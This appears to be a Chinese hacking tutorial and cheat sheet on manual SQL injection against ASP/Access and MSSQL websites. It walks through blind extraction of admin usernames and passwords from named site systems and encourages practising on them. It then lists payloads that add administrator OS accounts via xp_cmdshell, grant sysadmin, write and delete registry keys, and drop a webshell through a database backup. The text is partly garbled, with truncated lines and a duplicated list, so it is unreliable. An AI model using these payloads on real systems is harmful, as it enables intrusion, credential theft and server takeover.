SQL注入分析(手动注入检测) and 手动注入脚本命令精华版
员ID;4、测试管理员用户名长度和管理员密码长度;5、从高到低依次测试出管理员用户名和密码。 站一个分类网页,如盗帅下载系统中的/list.asp?id=11和逸风系统中的/class.asp?id=18等,在其后面 分别加入and 1=1 和and 1=2进行测试,具体形式为 and 1=2不能正常显示原页面内容,就说明有SQL注入漏洞了,可以进行下面的步骤。 类型的ASP系统来说,可以到网上去下载一个压缩包,用辅臣数据库浏览器打开数据库查看就可以了,一 般都是admin。无论是否知道表名,都加以下语句测试一下: and 0<>(select count(*) from admin) 如果能返回正常页面,说明表名就是admin,否则继续换表名测试。; 就能测到,具体测试语句为: and (select count(*) from admin where id=1) 变换最后的数字1进行测试,直到能正常返回原页面为止。 进行。 用户名长度: and (select count(*) from admin where id=5 and len(username)=4) 密码长度: and (select count(*) from admin where id=5 and len(pws)=4) 需要注意的是,表里存放用户名的字段username和存放密码的字段pws需要打开数据库进行确认。 正在测试用户名的第三位字母 :and (select count(*) from admin where id=5 and left (username,3)='ttd') 正在测试第7位密码:and (select count(*) from admin where id=5 and left(pws,7)='1506411') 好了,如果操作无误的话,你就可以测试出正确的用户名和密码了。马上到网上去找一个盗帅下载系 统或逸风网站系统练习吧! 正确、熟练掌握,单就马拉松式的测试用户名和密码就能累死你,每一位,如果是数字要测试10次,如 果是字母要测试26次,如果哪位老兄用户名和密码都用上了!@#$%的话,那你慢慢去测试吧,哈哈哈哈哈 ! -------------------------------------
1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符’and [查询条件] and ’’=’ 4.搜索时没过滤参数的’and [查询条件] and ’%25’=’ 5.判断数据库系统 6.猜数据库 ;and (select Count(*) from [数据库名])>0 7.猜字段 ;and (select Count(字段名) from 数据库名)>0 1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符’and [查询条件] and ’’=’ 4.搜索时没过滤参数的’and [查询条件] and ’%25’=’ 5.判断数据库系统 6.猜数据库 ;and (select Count(*) from [数据库名])>0 7.猜字段 ;and (select Count(字段名) from 数据库名)>0 8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 9.(1)猜字段的ascii值(access) (2)猜字段的ascii值(mssql) 10.测试权限结构(mssql) 11.添加mssql和系统的帐户 ;exec master.dbo.sp_password null,username,password;-- ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ;exec master.dbo.xp_cmdshell ’net user username password ;exec master.dbo.xp_cmdshell ’net user username password /add’;-- ;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;-- 12.(1)遍历目录 ;create table dirs(paths varchar(100), id int) (2)遍历目录 (255));-- 容 13.mssql中的存储过程 xp_regenumvalues 注册表根键, 子键 SOFTWARE/Microsoft/Windows/CurrentVersion/Run’ 以多个记录集方式返回所有键值 xp_regread 根键,子键,键值名 回制定键的值 xp_regwrite 根键,子键, 值名, 值类型, 值 TestValueName’,’reg_sz’,’hello’ 写入注册表 xp_regdeletevalue 根键,子键,值名 exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’ ,’TestValueName’ 删除某个值 xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey ’ 删除键,包括该键下所有值 14.mssql的backup创建webshell 15.mssql内置函数 16.简洁的webshell use model create table cmd(str image); insert into cmd(str) values (’’); backup database model to disk=’g:/wwwtest/l.asp’; 8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 9.(1)猜字段的ascii值(access) (2)猜字段的ascii值(mssql) 10.测试权限结构(mssql) 11.添加mssql和系统的帐户 ;exec master.dbo.sp_password null,username,password;-- ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ;exec master.dbo.xp_cmdshell ’net user username password ;exec master.dbo.xp_cmdshell ’net user username password /add’;-- ;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;-- 12.(1)遍历目录 ;create table dirs(paths varchar(100), id int) (2)遍历目录 (255));-- 容 13.mssql中的存储过程 xp_regenumvalues 注册表根键, 子键 SOFTWARE/Microsoft/Windows/CurrentVersion/Run’ 以多个记录集方式返回所有键值 xp_regread 根键,子键,键值名 回制定键的值 xp_regwrite 根键,子键, 值名, 值类型, 值 TestValueName’,’reg_sz’,’hello’ 写入注册表 xp_regdeletevalue 根键,子键,值名 exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’ ,’TestValueName’ 删除某个值 xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey ’ 删除键,包括该键下所有值 14.mssql的backup创建webshell 15.mssql内置函数 16.简洁的webshell use model create table cmd(str image); insert into cmd(str) values (’’); backup database model to disk=’g:/wwwtest/l.asp’; |